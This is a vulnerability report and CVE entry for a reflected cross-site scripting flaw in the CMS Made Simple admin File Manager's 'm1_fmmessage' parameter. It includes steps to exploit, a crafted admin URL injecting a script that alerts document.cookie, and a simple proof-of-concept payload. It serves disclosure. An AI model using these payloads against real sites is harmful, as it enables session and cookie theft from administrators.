Headline
CVE-2022-23907: CMS Made Simple - Forge : CMS Made Simple Core
CMS Made Simple v2.2.15 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the parameter m1_fmmessage.
[#12503] A Reflected cross-site scripting (XSS) in ‘m1_fmmessage’ parameter
Created By: fuzzyap1 (fuzzyap1)
Date Submitted: Thu Dec 09 10:15:23 -0500 2021
Assigned To: CMS Made Simple Foundation (cmsmsfoundation)
Version: 2.1.5
CMSMS Version: 2.1.5
Severity: Minor
Resolution: None
State: Open
Summary:
A Reflected cross-site scripting (XSS) in ‘m1_fmmessage’ parameter
Detailed Description:
Technical description: A Reflected cross-site scripting (XSS) vulnerability in CMS Made Simple 2.2.15 exists in the admin console via the global parameters of ‘m1_fmmessage’ parameter. Once the user completes an action, the page returns a link with ‘m1_fmmessage’ parameters this vulnerability allows an attacker to execute JavaScript in the context of the victim’s browser if the victim opens a vulnerable page containing an XSS payload.lead to cookie stealing, defacement and more.
on case Steps to exploit:
- Navigate to http://www.cmsms.com/admin/moduleinterface.php and delete any file in ‘file manage’
- Insert your payload in the response url “m1_fmmessages” parameter such as: http://www.cmsms.com/admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&__c=34f443492bff76e8334&m1_fileactiondelete=&m1_path=%2Fuploads%2Fimages&m1_selall=a%3A1%3A%7Bi%3A0%3Bs%3A76%3A%22OGU0ODI3MjgzMDQxMjA3MjAzM2I3MDI3YjJhMDMzMTkzMmIwODkyMnx4c3NwYXlsb2FkLnR4dA%3D%3D%22%3B%7D&m1_submit=Delete&m1_fmmessage=deletesuccess<ScRiPt>alert(document.cookie)</ScRiPt>
- Refresh the page
Proof of concept (Poc): The following payload will allow you to run the javascript : <ScRiPt>alert(1)</ScRiPt>
History